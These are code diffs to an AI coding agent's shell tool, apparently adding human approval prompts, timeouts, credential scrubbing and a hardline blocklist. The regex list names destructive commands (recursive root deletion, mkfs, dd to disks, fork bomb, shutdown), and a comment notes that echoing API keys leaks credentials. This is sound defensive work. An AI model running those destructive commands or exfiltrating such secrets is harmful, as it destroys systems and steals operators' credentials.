+    if (command === 'exec') return config.commands?.exec?.devTools;
+    if (askWrite) return config.commands?.ask?.devTools;
+    if (command === 'code') return config.commands?.code?.devTools;
+    return undefined;
   }
 }
 

--- a/packages/agent/src/modules/interactiveSessionModule.ts
+++ b/packages/agent/src/modules/interactiveSessionModule.ts
@@ -61,7 +61,8 @@ export async function createInteractiveSession(
     //   [a]lways  — additionally persist it to the project allow-list,
     //   anything else → reject (fail-closed).
     // The runner consults the allow-list BEFORE calling this, so trusted commands never reach
-    // this prompt at all. (The Ink TUI path does not yet surface this prompt — see EXT-9 report.)
+    // this prompt at all. (The Ink TUI surfaces the same scoped prompt via an approval bridge —
+    // see tuiSessionModule's createApprovalBridge + the <ApprovalPrompt> component.)
     runner.setToolApprovalCallback(async (pending) => {
       const commandText =
         typeof pending.args.command === 'string'

--- a/packages/agent/src/modules/interactiveSessionModule.ts
+++ b/packages/agent/src/modules/interactiveSessionModule.ts
@@ -3,6 +3,7 @@ import {
   defaultStatusCallback,
   display,
   displayInfo,
+  displayWarning,
   flushSessionLog,
   formatInputPrompt,
   initSessionLogging,
@@ -50,6 +51,29 @@ export async function createInteractiveSession(
     await runner.init(sessionConfig.mode, config, checkpointSaver);
     const rl = createInterface({ input, output });
     let shouldExit = false;
+
+    // Tool-approval (human-in-the-loop) prompt for gated tools — currently the opt-in
+    // `run_shell_command`. When a run suspends on such a tool call, the runner calls this with
+    // the pending command; a simple readline y/n confirm gates execution. Anything other than an
+    // explicit "y"/"yes" rejects (fail-closed). The model gets a tool-rejected message on reject
+    // and continues. (The Ink TUI path does not yet surface this prompt — see EXT-9 report.)
+    runner.setToolApprovalCallback(async (pending) => {
+      const commandText =
+        typeof pending.args.command === 'string'
+          ? (pending.args.command as string)
+          : JSON.stringify(pending.args);
+      displayWarning(`\nThe agent wants to run a shell command via ${pending.name}:`);
+      display(`\n    ${commandText}\n`);
+      setRawMode(false); // ensure typed input is echoed for this confirm
+      const answer = await rl.question(formatInputPrompt('Run this command? (y/N): '));
+      const approved = answer.trim().toLowerCase().startsWith('y');
+      if (!approved) {
+        displayInfo('Command rejected.');
+      }
+      return approved
+        ? { type: 'approve' }
+        : { type: 'reject', message: 'User rejected the shell command.' };
+    });
 
     if (logFileName) {
       displayInfo(`${sessionConfig.mode} session will be logged to ${logFileName}\n`);

--- a/packages/agent/src/modules/interactiveSessionModule.ts
+++ b/packages/agent/src/modules/interactiveSessionModule.ts
@@ -54,9 +54,14 @@ export async function createInteractiveSession(
 
     // Tool-approval (human-in-the-loop) prompt for gated tools — currently the opt-in
     // `run_shell_command`. When a run suspends on such a tool call, the runner calls this with
-    // the pending command; a simple readline y/n confirm gates execution. Anything other than an
-    // explicit "y"/"yes" rejects (fail-closed). The model gets a tool-rejected message on reject
-    // and continues. (The Ink TUI path does not yet surface this prompt — see EXT-9 report.)
+    // the pending command. EXT-9 Tier-2: instead of a bare y/N, offer a scoped choice so the
+    // human can stop re-prompting for an operation they trust:
+    //   [o]nce    — approve this single invocation only (persists nothing),
+    //   [s]ession — auto-approve this command's classified prefix for the rest of the session,
+    //   [a]lways  — additionally persist it to the project allow-list,
+    //   anything else → reject (fail-closed).
+    // The runner consults the allow-list BEFORE calling this, so trusted commands never reach
+    // this prompt at all. (The Ink TUI path does not yet surface this prompt — see EXT-9 report.)
     runner.setToolApprovalCallback(async (pending) => {
       const commandText =
         typeof pending.args.command === 'string'
@@ -65,14 +70,24 @@ export async function createInteractiveSession(
       displayWarning(`\nThe agent wants to run a shell command via ${pending.name}:`);
       display(`\n    ${commandText}\n`);
       setRawMode(false); // ensure typed input is echoed for this confirm
-      const answer = await rl.question(formatInputPrompt('Run this command? (y/N): '));
-      const approved = answer.trim().toLowerCase().startsWith('y');
-      if (!approved) {
-        displayInfo('Command rejected.');
+      const answer = (
+        await rl.question(formatInputPrompt('Approve? [o]nce / [s]ession / [a]lways / [N]o: '))
+      )
+        .trim()
+        .toLowerCase();
+      if (answer === 'o' || answer === 'once') {
+        return { type: 'approve', scope: 'once' };
       }
-      return approved
-        ? { type: 'approve' }
-        : { type: 'reject', message: 'User rejected the shell command.' };
+      if (answer === 's' || answer === 'session') {
+        displayInfo('Approved for this session — future variants will not re-prompt.');
+        return { type: 'approve', scope: 'session' };
+      }
+      if (answer === 'a' || answer === 'always') {
+        displayInfo('Approved and remembered — saved to the project allow-list.');
+        return { type: 'approve', scope: 'always' };
+      }
+      displayInfo('Command rejected.');
+      return { type: 'reject', message: 'User rejected the shell command.' };
     });
 
     if (logFileName) {

--- a/packages/agent/src/tools/GthDevToolkit.ts
+++ b/packages/agent/src/tools/GthDevToolkit.ts
@@ -5,9 +5,52 @@ import { BaseToolkit, StructuredToolInterface, tool } from '@langchain/core/tool
 import { z } from 'zod';
 import { spawn } from 'child_process';
 import path from 'node:path';
-import { displayInfo, displayError } from '@gaunt-sloth/core/utils/consoleUtils.js';
-import { GthDevToolsConfig, isShellToolEnabled } from '@gaunt-sloth/core/config.js';
+import { displayInfo, displayError, displayWarning } from '@gaunt-sloth/core/utils/consoleUtils.js';
+import {
+  GthDevToolsConfig,
+  getShellMaxOutputBytes,
+  getShellTimeoutMs,
+  isShellToolEnabled,
+} from '@gaunt-sloth/core/config.js';
 import { stdout } from '@gaunt-sloth/core/utils/systemUtils.js';
+import { checkHardline } from '#src/tools/shell/hardline.js';
+import { buildScrubbedEnv } from '#src/tools/shell/env.js';
+import { OutputBuffer } from '#src/tools/shell/outputBuffer.js';
+
+// Grace period (ms) between SIGTERM and the escalation to SIGKILL when a command
+// exceeds its timeout. Mirrors opencode's `forceKillAfter` (3s).
+const KILL_GRACE_MS = 3_000;
+
+/**
+ * Kill the child AND its descendants. Because the child is spawned `detached`, it
+ * leads its own process group, so signalling the NEGATIVE pid (`-pid`) delivers
+ * to the whole group — otherwise a shell's children (e.g. a spawned server) would
+ * be orphaned and keep running after a timeout. Swallows the EPERM/ESRCH races
+ * that occur when the process has already exited.
+ */
+function killProcessGroup(
+  child: { pid?: number; kill: (signal?: NodeJS.Signals) => boolean },
+  signal: NodeJS.Signals
+): void {
+  try {
+    if (typeof child.pid === 'number') {
+      // Negative pid → signal the entire process group.
+      process.kill(-child.pid, signal);
+      return;
+    }
+  } catch (e) {
+    const code = (e as NodeJS.ErrnoException)?.code;
+    // ESRCH: already gone. EPERM: group-kill not permitted — fall through to the
+    // direct child kill below. Anything else: also fall back rather than throw.
+    if (code === 'ESRCH') return;
+  }
+  // Fallback: kill just the child (best effort).
+  try {
+    child.kill(signal);
+  } catch {
+    // Already exited — nothing to do.
+  }
+}
 
 // Helper function to create a tool with dev type
 function createGthTool<T extends z.ZodSchema>(
@@ -120,22 +163,73 @@ export default class GthDevToolkit extends BaseToolkit {
     }
   }
 
+  /**
+   * Execute a shell command with the EXT-9 Tier-1 hardening applied:
+   *  1. stdin closed + timeout + process-group kill (no hang on interactive
+   *     commands; runaway commands are killed group-wide on timeout),
+   *  2. output capped with a head/tail window + temp-file spillover,
+   *  3. provider/LLM credentials scrubbed from the child env,
+   *  4. an unbypassable hardline blocklist (refuses catastrophic commands BEFORE
+   *     spawn — fires even when confirmation is bypassed by yolo).
+   *
+   * Resolves with a model-facing string. Timeouts resolve (not reject) so the
+   * model sees the killed-after-N message and can continue.
+   */
   private async executeCommand(command: string, toolName: string): Promise<string> {
     displayInfo(`\n🔧 Executing ${toolName}: ${command}`);
+
+    // (4) Hardline blocklist — checked here so it fires regardless of yolo,
+    // allow-lists, or any confirmation path. Refuse WITHOUT executing.
+    const hardline = checkHardline(command);
+    if (hardline) {
+      const refusal =
+        `Refusing to execute '${command}': blocked by hardline safety policy ` +
+        `(${hardline.description}). This is a catastrophic, non-recoverable command ` +
+        `and is blocked even when command confirmation is disabled.`;
+      displayWarning(`\n⛔ ${refusal}`);
+      return refusal;
+    }
+
+    const timeoutMs = getShellTimeoutMs(this.commands);
+    const maxOutputBytes = getShellMaxOutputBytes(this.commands);
 
     return new Promise((resolve, reject) => {
       const child = spawn(command, {
         shell: true,
+        // (1) Never let the child block on stdin (e.g. git commit opening $EDITOR).
+        stdio: ['ignore', 'pipe', 'pipe'],
+        // (1) Own process group so we can kill the whole tree on timeout.
+        detached: true,
+        // (3) Child env with provider/LLM credentials removed.
+        env: buildScrubbedEnv(),
       });
 
-      let output = '';
+      // (2) Bounded capture for the returned message; live streaming is uncapped.
+      const buffer = new OutputBuffer(maxOutputBytes);
+      let timedOut = false;
+      let settled = false;
+      let killTimer: NodeJS.Timeout | undefined;
 
-      // Capture output if available (when stdio is not 'inherit')
+      const timeoutTimer = setTimeout(() => {
+        timedOut = true;
+        killProcessGroup(child, 'SIGTERM');
+        // Escalate to SIGKILL after a short grace if it didn't die.
+        killTimer = setTimeout(() => killProcessGroup(child, 'SIGKILL'), KILL_GRACE_MS);
+        // killTimer must not keep the event loop alive on its own.
+        killTimer.unref?.();
+      }, timeoutMs);
+      timeoutTimer.unref?.();
+
+      const clearTimers = (): void => {
+        clearTimeout(timeoutTimer);
+        if (killTimer) clearTimeout(killTimer);
+      };
+
       if (child.stdout) {
         child.stdout.on('data', (data) => {
           const chunk = data.toString();
           stdout.write(chunk);
-          output += chunk;
+          buffer.append(chunk);
         });
       }
 
@@ -143,31 +237,44 @@ export default class GthDevToolkit extends BaseToolkit {
         child.stderr.on('data', (data) => {
           const chunk = data.toString();
           stdout.write(chunk);
-          output += chunk;
+          buffer.append(chunk);
         });
       }
 
       child.on('close', (code) => {
+        if (settled) return;
+        settled = true;
+        clearTimers();
+
+        const captured = buffer.finalize();
+        const body =
+          `Executing '${command}'...\n\n` +
+          `<COMMAND_OUTPUT>\n` +
+          captured.text +
+          `</COMMAND_OUTPUT>\n`;
+
+        if (timedOut) {
+          resolve(
+            body +
+              `\n\nCommand '${command}' was killed after exceeding the ${Math.round(
+                timeoutMs / 1000
+              )}s timeout. ` +
+              `If it legitimately needs longer, increase the shell timeout in config.`
+          );
+          return;
+        }
+
         if (code === 0) {
-          resolve(
-            `Executing '${command}'...\n\n` +
-              `<COMMAND_OUTPUT>\n` +
-              output +
-              `</COMMAND_OUTPUT>\n` +
-              `\n\nCommand '${command}' completed successfully`
-          );
+          resolve(body + `\n\nCommand '${command}' completed successfully`);
         } else {
-          resolve(
-            `Executing '${command}'...\n\n` +
-              `<COMMAND_OUTPUT>\n` +
-              output +
-              `</COMMAND_OUTPUT>\n` +
-              `\n\nCommand '${command}' exited with code ${code}`
-          );
+          resolve(body + `\n\nCommand '${command}' exited with code ${code}`);
         }
       });
 
       child.on('error', (error) => {
+        if (settled) return;
+        settled = true;
+        clearTimers();
         const errorMsg = `Failed to execute command '${command}': ${error.message}`;
         displayError(errorMsg);
         reject(new Error(errorMsg));

--- a/packages/agent/src/tools/GthDevToolkit.ts
+++ b/packages/agent/src/tools/GthDevToolkit.ts
@@ -6,7 +6,7 @@ import { z } from 'zod';
 import { spawn } from 'child_process';
 import path from 'node:path';
 import { displayInfo, displayError } from '@gaunt-sloth/core/utils/consoleUtils.js';
-import { GthDevToolsConfig } from '@gaunt-sloth/core/config.js';
+import { GthDevToolsConfig, isShellToolEnabled } from '@gaunt-sloth/core/config.js';
 import { stdout } from '@gaunt-sloth/core/utils/systemUtils.js';
 
 // Helper function to create a tool with dev type
@@ -31,6 +31,9 @@ const RunLintArgsSchema = z.object({});
 const RunBuildArgsSchema = z.object({});
 const RunSingleTestArgsSchema = z.object({
   testPath: z.string().describe('Relative path to the test file to run'),
+});
+const RunShellCommandArgsSchema = z.object({
+  command: z.string().describe('The shell command to run'),
 });
 
 const TEST_PATH_PLACEHOLDER = '${testPath}';
@@ -244,6 +247,30 @@ export default class GthDevToolkit extends BaseToolkit {
               'Build the project. Executes the configured build command and returns the build output.' +
               `\nThe configured command is [${this.commands.run_build!}].`,
             schema: RunBuildArgsSchema,
+          },
+          'execute'
+        )
+      );
+    }
+
+    // Opt-in general-purpose shell tool. Unlike the fixed run_* commands, the model supplies
+    // the command, so the guardrail is the per-command confirmation dialog wired by the deep
+    // agent (createDeepAgent `interruptOn`), not a parameter sanitizer — a real shell command
+    // legitimately contains pipes / `$` / `;`, so validateParameterValue must NOT be applied.
+    if (isShellToolEnabled(this.commands)) {
+      tools.push(
+        createGthTool(
+          async (args: z.infer<typeof RunShellCommandArgsSchema>): Promise<string> => {
+            return await this.executeCommand(args.command, 'run_shell_command');
+          },
+          {
+            name: 'run_shell_command',
+            description:
+              'Run an arbitrary shell command in the project working directory and return its ' +
+              'combined stdout/stderr and exit status. Use for any task the fixed run_* tools do ' +
+              'not cover (e.g. git, package managers, file inspection). Each call is subject to ' +
+              'human approval before it runs unless approval has been disabled.',
+            schema: RunShellCommandArgsSchema,
           },
           'execute'
         )

--- a/packages/agent/src/tools/shell/allowlist.ts
+++ b/packages/agent/src/tools/shell/allowlist.ts
@@ -1,0 +1,18 @@
+/**
+ * @module tools/shell/allowlist
+ *
+ * Re-export of the EXT-9 Tier-2 allow-list engine. The implementation lives in
+ * `@gaunt-sloth/core` (`core/shell/allowlist`) because the core {@link GthAgentRunner}
+ * owns the per-instance session store and the loaded persisted store and consults
+ * `matchesApproval` before prompting (core cannot import from `@gaunt-sloth/agent`).
+ *
+ * See the core module for the exact safe-bin / anti-widening matching rule.
+ */
+export {
+  matchesApproval,
+  hasWideningFlag,
+  AllowlistStore,
+  PersistedAllowlist,
+  type ApprovalScope,
+  type ApprovalStores,
+} from '@gaunt-sloth/core/core/shell/allowlist.js';

--- a/packages/agent/src/tools/shell/arity.ts
+++ b/packages/agent/src/tools/shell/arity.ts
@@ -1,0 +1,16 @@
+/**
+ * @module tools/shell/arity
+ *
+ * Re-export of the EXT-9 Tier-2 command classifier. The implementation lives in
+ * `@gaunt-sloth/core` (`core/shell/arity`) because the core {@link GthAgentRunner}
+ * must consult it BEFORE prompting (and core cannot import from `@gaunt-sloth/agent`).
+ * This stable agent-side path is kept for tests and any agent-layer consumers.
+ *
+ * See the core module for the arity table scope and the anti-injection fail-closed rule.
+ */
+export {
+  classifyCommand,
+  tokenize,
+  meaningfulPrefixTokens,
+  type CommandClassification,
+} from '@gaunt-sloth/core/core/shell/arity.js';

--- a/packages/agent/src/tools/shell/env.ts
+++ b/packages/agent/src/tools/shell/env.ts
@@ -1,0 +1,113 @@
+/**
+ * @module tools/shell/env
+ *
+ * Credential scrubbing for the shell tool's child environment. By default a
+ * spawned child inherits `process.env` verbatim, so an approved (or yolo'd)
+ * command can `echo $ANTHROPIC_API_KEY` and exfiltrate the operator's LLM/cloud
+ * credentials. {@link buildScrubbedEnv} returns a copy of the parent env with
+ * those credentials removed before spawn.
+ *
+ * Policy (deliberately scoped):
+ * - Strip LLM provider keys and cloud-provider secrets (the explicit blocklist +
+ *   a wildcard sweep for `*_API_KEY` / `*_TOKEN` / `*_SECRET` / `*SECRET_KEY`).
+ * - LEAVE generic dev env intact (PATH, HOME, SHELL, LANG, npm/pnpm config, …)
+ *   so normal commands still work.
+ * - LEAVE `GITHUB_TOKEN` / `GH_TOKEN` intact: gaunt-sloth's content/requirement
+ *   providers shell out to `gh` (`gh pr diff`, `gh issue view`), so stripping
+ *   these would break first-class workflows. They are explicitly allow-listed
+ *   against the wildcard `*_TOKEN` sweep.
+ *
+ * Patterned after hermes-agent `_HERMES_PROVIDER_ENV_BLOCKLIST` (tools/environments/local.py)
+ * — but narrower: we only own the provider/cloud-secret floor.
+ */
+import { env as processEnv } from '@gaunt-sloth/core/utils/systemUtils.js';
+
+/**
+ * Explicit blocklist of LLM-provider and cloud credentials. Covers the providers
+ * gaunt-sloth (and its consumers) can be configured against, plus the standard
+ * cloud secret-bearing vars. Matched case-insensitively.
+ */
+export const CREDENTIAL_BLOCKLIST: ReadonlyArray<string> = [
+  // LLM providers
+  'ANTHROPIC_API_KEY',
+  'ANTHROPIC_AUTH_TOKEN',
+  'CLAUDE_CODE_OAUTH_TOKEN',
+  'OPENAI_API_KEY',
+  'GOOGLE_API_KEY',
+  'GEMINI_API_KEY',
+  'GOOGLE_APPLICATION_CREDENTIALS',
+  'GROQ_API_KEY',
+  'XAI_API_KEY',
+  'DEEPSEEK_API_KEY',
+  'MISTRAL_API_KEY',
+  'OPENROUTER_API_KEY',
+  'COHERE_API_KEY',
+  'TOGETHER_API_KEY',
+  'PERPLEXITY_API_KEY',
+  'FIREWORKS_API_KEY',
+  // Azure OpenAI
+  'AZURE_OPENAI_API_KEY',
+  'AZURE_API_KEY',
+  // Cloud provider secrets (AWS / GCP)
+  'AWS_SECRET_ACCESS_KEY',
+  'AWS_SESSION_TOKEN',
+  'AWS_ACCESS_KEY_ID',
+];
+
+/**
+ * Allow-list of credential-shaped names that must survive the wildcard sweep
+ * because gaunt-sloth legitimately depends on them. Matched case-insensitively.
+ */
+export const CREDENTIAL_ALLOWLIST: ReadonlyArray<string> = [
+  // `gh` CLI auth — used by the github content/requirement providers.
+  'GITHUB_TOKEN',
+  'GH_TOKEN',
+];
+
+// Wildcard sweep: any var whose name ends in one of these suffixes is treated as
+// a secret and stripped (unless allow-listed). Catches provider keys we didn't
+// enumerate (e.g. a new `FOO_API_KEY`).
+const SECRET_SUFFIXES = [
+  /_API_KEY$/i,
+  /_SECRET_ACCESS_KEY$/i,
+  /_SECRET_KEY$/i,
+  /_SECRET$/i,
+  /_TOKEN$/i,
+];
+
+function isAllowlisted(name: string): boolean {
+  return CREDENTIAL_ALLOWLIST.some((a) => a.toUpperCase() === name.toUpperCase());
+}
+
+function isBlocklisted(name: string): boolean {
+  return CREDENTIAL_BLOCKLIST.some((b) => b.toUpperCase() === name.toUpperCase());
+}
+
+function matchesSecretSuffix(name: string): boolean {
+  return SECRET_SUFFIXES.some((re) => re.test(name));
+}
+
+/**
+ * True when an env var name should be scrubbed from the child environment.
+ * Exported for testing.
+ */
+export function shouldScrubEnvVar(name: string): boolean {
+  if (isAllowlisted(name)) return false;
+  if (isBlocklisted(name)) return true;
+  return matchesSecretSuffix(name);
+}
+
+/**
+ * Build the child environment for a spawned shell command: a copy of the parent
+ * env with LLM/cloud credentials removed. Defaults to the live `process.env`
+ * (via systemUtils); a source can be injected for testing.
+ */
+export function buildScrubbedEnv(source: NodeJS.ProcessEnv = processEnv): NodeJS.ProcessEnv {
+  const scrubbed: NodeJS.ProcessEnv = {};
+  for (const [key, value] of Object.entries(source)) {
+    if (value === undefined) continue;
+    if (shouldScrubEnvVar(key)) continue;
+    scrubbed[key] = value;
+  }
+  return scrubbed;
+}

--- a/packages/agent/src/tools/shell/hardline.ts
+++ b/packages/agent/src/tools/shell/hardline.ts
@@ -1,0 +1,96 @@
+/**
+ * @module tools/shell/hardline
+ *
+ * Unbypassable hardline blocklist for the shell tool. These are catastrophic,
+ * non-recoverable commands (wipe the root filesystem, format a disk, overwrite a
+ * raw block device, fork-bomb, take the host down). They are refused inside
+ * `executeCommand` itself — BEFORE spawn — so the refusal fires regardless of
+ * yolo (`shellYolo`), any allow-list, or the confirmation path. yolo deliberately
+ * bypasses the *confirmation*; it does NOT bypass this floor.
+ *
+ * Recoverable-but-costly operations (e.g. `git reset --hard`, `rm -rf ./build`,
+ * `chmod -R 777 ./dir`, `curl | sh`) are intentionally NOT here — those are what
+ * the confirmation dialog / yolo are for.
+ *
+ * Patterns match the NORMALIZED command ({@link ./normalize.js}) so obfuscation
+ * (ANSI/fullwidth/backslash splits/whitespace padding) cannot bypass them.
+ *
+ * Patterned after hermes-agent `tools/approval.py` HARDLINE_PATTERNS.
+ */
+import { normalizeCommand } from '#src/tools/shell/normalize.js';
+
+// Matches a position where the shell would begin parsing a NEW command: start of
+// string, after a separator (; & | newline), after `$(` or backtick, optionally
+// consuming leading wrappers (sudo/env VAR=VAL/exec/nohup/setsid/time). Used by
+// the shutdown-family patterns so they don't false-positive on `echo reboot`.
+const CMD_POS =
+  '(?:^|[;&|\\n`]|\\$\\()' +
+  '\\s*' +
+  '(?:sudo\\s+(?:-[^\\s]+\\s+)*)?' +
+  '(?:env\\s+(?:\\w+=\\S*\\s+)*)?' +
+  '(?:(?:exec|nohup|setsid|time)\\s+)*' +
+  '\\s*';
+
+/**
+ * Hardline patterns: [regex, human description]. Matched case-insensitively
+ * against the normalized command.
+ */
+export const HARDLINE_PATTERNS: ReadonlyArray<readonly [RegExp, string]> = [
+  // rm -rf targeting the root filesystem (`/`, `/*`).
+  [/\brm\s+(?:-[^\s]*\s+)*\/\s*\*?\s*(?:$|[;&|])/, 'recursive delete of root filesystem'],
+  // rm -rf targeting protected system directories (with optional /* suffix).
+  [
+    /\brm\s+(?:-[^\s]*\s+)*(?:\/(?:home|root|etc|usr|var|bin|sbin|boot|lib|lib64|opt|sys|proc))(?:\/\*)?\s*(?:$|[;&|])/,
+    'recursive delete of system directory',
+  ],
+  // rm -rf targeting the home directory (~ or $HOME).
+  // Note: patterns match the LOWERCASED normalized command, so $HOME → $home.
+  [
+    /\brm\s+(?:-[^\s]*\s+)*(?:~|\$home)(?:\/\*)?\s*(?:$|[;&|])/,
+    'recursive delete of home directory',
+  ],
+  // Filesystem format.
+  [/\bmkfs(?:\.[a-z0-9]+)?\b/, 'format filesystem (mkfs)'],
+  // dd writing to a raw block device.
+  [/\bdd\b[^\n]*\bof=\/dev\/(?:sd|nvme|hd|mmcblk|vd|xvd)[a-z0-9]*/, 'dd to raw block device'],
+  // Shell redirection to a raw block device (`> /dev/sda`).
+  [/>\s*\/dev\/(?:sd|nvme|hd|mmcblk|vd|xvd)[a-z0-9]*\b/, 'redirect to raw block device'],
+  // Classic fork bomb `:(){ :|:& };:`.
+  [/:\s*\(\s*\)\s*\{\s*:\s*\|\s*:\s*&\s*\}\s*;\s*:/, 'fork bomb'],
+  // chmod -R 777 / (recursive world-writable on root).
+  [
+    /\bchmod\s+(?:-[^\s]*\s+)*(?:-r|--recursive)\s+(?:-[^\s]*\s+)*777\s+\//,
+    'recursive chmod 777 of root',
+  ],
+  // Kill every process on the system (`kill -1`, `kill -9 -1`).
+  [/\bkill\s+(?:-[^\s]+\s+)*-1\b/, 'kill all processes'],
+  // System shutdown / reboot — anchored to a command position so `echo reboot`
+  // and `grep shutdown log` don't trip it.
+  [new RegExp(CMD_POS + '(?:shutdown|reboot|halt|poweroff)\\b'), 'system shutdown/reboot'],
+  [new RegExp(CMD_POS + 'init\\s+[06]\\b'), 'init 0/6 (shutdown/reboot)'],
+  [
+    new RegExp(CMD_POS + 'systemctl\\s+(?:poweroff|reboot|halt|kexec)\\b'),
+    'systemctl poweroff/reboot',
+  ],
+  [new RegExp(CMD_POS + 'telinit\\s+[06]\\b'), 'telinit 0/6 (shutdown/reboot)'],
+];
+
+export interface HardlineMatch {
+  /** Human-readable reason the command was refused. */
+  description: string;
+}
+
+/**
+ * Check a raw command against the hardline blocklist. Normalizes first so
+ * obfuscated variants are caught. Returns the match (with a description) when the
+ * command is catastrophic, or `null` when it is allowed to proceed.
+ */
+export function checkHardline(command: string): HardlineMatch | null {
+  const normalized = normalizeCommand(command).toLowerCase();
+  for (const [pattern, description] of HARDLINE_PATTERNS) {
+    if (pattern.test(normalized)) {
+      return { description };
+    }
+  }
+  return null;
+}

--- a/packages/agent/src/tools/shell/normalize.ts
+++ b/packages/agent/src/tools/shell/normalize.ts
@@ -1,0 +1,53 @@
+/**
+ * @module tools/shell/normalize
+ *
+ * Command-string normalization shared by the shell hardening layer. The hardline
+ * blocklist ({@link ../shell/hardline.js}) matches against the *normalized* form so
+ * trivial obfuscation (ANSI escapes, fullwidth glyphs, backslash splits, padded
+ * whitespace) cannot smuggle a catastrophic command past the guard. Kept in its own
+ * importable module because EXT-9 Tier-2 (allow-list classification) will reuse it.
+ *
+ * Patterned after hermes-agent `tools/approval.py:_normalize_command_for_detection`.
+ */
+
+// ANSI / ECMA-48 escape sequences. ESC = \x1b, BEL = \x07, ST = ESC \.
+// CSI: ESC [ params intermediates final.
+const ANSI_CSI = /\x1b\[[0-?]*[ -/]*[@-~]/g;
+// OSC: ESC ] ... terminated by BEL or ST (ESC \).
+const ANSI_OSC = /\x1b\][\s\S]*?(?:\x07|\x1b\\)/g;
+// Any remaining 2-char escape: ESC followed by a single byte.
+const ANSI_LONE = /\x1b[@-Z\\-_]?/g;
+// Null bytes.
+const NULL_BYTES = /\x00/g;
+
+/**
+ * Normalize a command string before dangerous-pattern matching.
+ *
+ * Steps (each closes an obfuscation bypass):
+ * - strip ANSI escape sequences (CSI / OSC / lone-escape),
+ * - drop null bytes,
+ * - Unicode NFKC fold (fullwidth `ｒｍ` → `rm`, etc.),
+ * - collapse shell backslash-escapes (`r\m` → `rm`, `\-rf` → `-rf`),
+ * - drop empty-string literals that split tokens (`r''m` / `r""m` → `rm`),
+ * - fold runs of whitespace (incl. tabs/newlines) to single spaces and trim.
+ *
+ * This is intentionally lossy: the normalized form is ONLY used for detection,
+ * never for execution (the original command is what runs).
+ */
+export function normalizeCommand(command: string): string {
+  let c = command;
+  c = c.replace(ANSI_CSI, '');
+  c = c.replace(ANSI_OSC, '');
+  c = c.replace(ANSI_LONE, '');
+  c = c.replace(NULL_BYTES, '');
+  // Unicode compatibility fold (fullwidth → ASCII, etc.).
+  c = c.normalize('NFKC');
+  // Collapse backslash-escapes: `\x` → `x` (prevents `r\m -rf /` bypass).
+  // Applied before empty-string stripping so `r\m` and `r''m` both fold.
+  c = c.replace(/\\([^\n])/g, '$1');
+  // Drop empty-string literals used to split a token: `r''m` / `r""m` → `rm`.
+  c = c.replace(/''|""/g, '');
+  // Fold all whitespace runs (spaces, tabs, newlines) to a single space, trim.
+  c = c.replace(/\s+/g, ' ').trim();
+  return c;
+}

--- a/packages/agent/src/tools/shell/normalize.ts
+++ b/packages/agent/src/tools/shell/normalize.ts
@@ -1,53 +1,10 @@
 /**
  * @module tools/shell/normalize
  *
- * Command-string normalization shared by the shell hardening layer. The hardline
- * blocklist ({@link ../shell/hardline.js}) matches against the *normalized* form so
- * trivial obfuscation (ANSI escapes, fullwidth glyphs, backslash splits, padded
- * whitespace) cannot smuggle a catastrophic command past the guard. Kept in its own
- * importable module because EXT-9 Tier-2 (allow-list classification) will reuse it.
- *
- * Patterned after hermes-agent `tools/approval.py:_normalize_command_for_detection`.
+ * Re-export of the canonical command normalizer, which now lives in
+ * `@gaunt-sloth/core` (`core/shell/normalize`) so the core runner's EXT-9 Tier-2
+ * allow-list classifier and the agent's Tier-1 hardline blocklist share ONE
+ * implementation. Kept as a stable import path for existing agent-side consumers
+ * (`tools/shell/hardline`, specs).
  */
-
-// ANSI / ECMA-48 escape sequences. ESC = \x1b, BEL = \x07, ST = ESC \.
-// CSI: ESC [ params intermediates final.
-const ANSI_CSI = /\x1b\[[0-?]*[ -/]*[@-~]/g;
-// OSC: ESC ] ... terminated by BEL or ST (ESC \).
-const ANSI_OSC = /\x1b\][\s\S]*?(?:\x07|\x1b\\)/g;
-// Any remaining 2-char escape: ESC followed by a single byte.
-const ANSI_LONE = /\x1b[@-Z\\-_]?/g;
-// Null bytes.
-const NULL_BYTES = /\x00/g;
-
-/**
- * Normalize a command string before dangerous-pattern matching.
- *
- * Steps (each closes an obfuscation bypass):
- * - strip ANSI escape sequences (CSI / OSC / lone-escape),
- * - drop null bytes,
- * - Unicode NFKC fold (fullwidth `ｒｍ` → `rm`, etc.),
- * - collapse shell backslash-escapes (`r\m` → `rm`, `\-rf` → `-rf`),
- * - drop empty-string literals that split tokens (`r''m` / `r""m` → `rm`),
- * - fold runs of whitespace (incl. tabs/newlines) to single spaces and trim.
- *
- * This is intentionally lossy: the normalized form is ONLY used for detection,
- * never for execution (the original command is what runs).
- */
-export function normalizeCommand(command: string): string {
-  let c = command;
-  c = c.replace(ANSI_CSI, '');
-  c = c.replace(ANSI_OSC, '');
-  c = c.replace(ANSI_LONE, '');
-  c = c.replace(NULL_BYTES, '');
-  // Unicode compatibility fold (fullwidth → ASCII, etc.).
-  c = c.normalize('NFKC');
-  // Collapse backslash-escapes: `\x` → `x` (prevents `r\m -rf /` bypass).
-  // Applied before empty-string stripping so `r\m` and `r''m` both fold.
-  c = c.replace(/\\([^\n])/g, '$1');
-  // Drop empty-string literals used to split a token: `r''m` / `r""m` → `rm`.
-  c = c.replace(/''|""/g, '');
-  // Fold all whitespace runs (spaces, tabs, newlines) to a single space, trim.
-  c = c.replace(/\s+/g, ' ').trim();
-  return c;
-}
+export { normalizeCommand } from '@gaunt-sloth/core/core/shell/normalize.js';

--- a/packages/agent/src/tools/shell/outputBuffer.ts
+++ b/packages/agent/src/tools/shell/outputBuffer.ts
@@ -1,0 +1,180 @@
+/**
+ * @module tools/shell/outputBuffer
+ *
+ * Bounded capture of a shell command's combined stdout/stderr for the value
+ * returned to the model. A noisy build/test log can be megabytes; dumping it
+ * verbatim into a ToolMessage blows the context window. This buffer keeps a
+ * HEAD window (the first N bytes) and a TAIL ring-buffer (the last N bytes) and
+ * drops the middle, while accumulating the FULL output separately so it can be
+ * spilled to a temp file the model can re-read with `read_file`.
+ *
+ * Live streaming to the terminal is unaffected — the toolkit still writes every
+ * chunk to stdout as it arrives; only the returned string is capped.
+ *
+ * Patterned after opencode `bash.ts` (per-stream cap + temp-file tail) and
+ * openclaw `bash-tools.shared.ts` `truncateMiddle`.
+ */
+import { writeFileSync } from 'node:fs';
+import { tmpdir } from 'node:os';
+import path from 'node:path';
+
+export interface CappedOutput {
+  /** The bounded text to surface to the model (head + tail with a gap note). */
+  text: string;
+  /** True when the output exceeded the budget and was truncated. */
+  truncated: boolean;
+  /** Total bytes captured (the full, untruncated size). */
+  totalBytes: number;
+  /** Absolute path to the spilled full output, or undefined when not truncated. */
+  spillPath?: string;
+}
+
+/**
+ * Accumulates command output up to a byte budget using a head + tail window.
+ * The full output is retained in memory so it can be spilled to disk on demand;
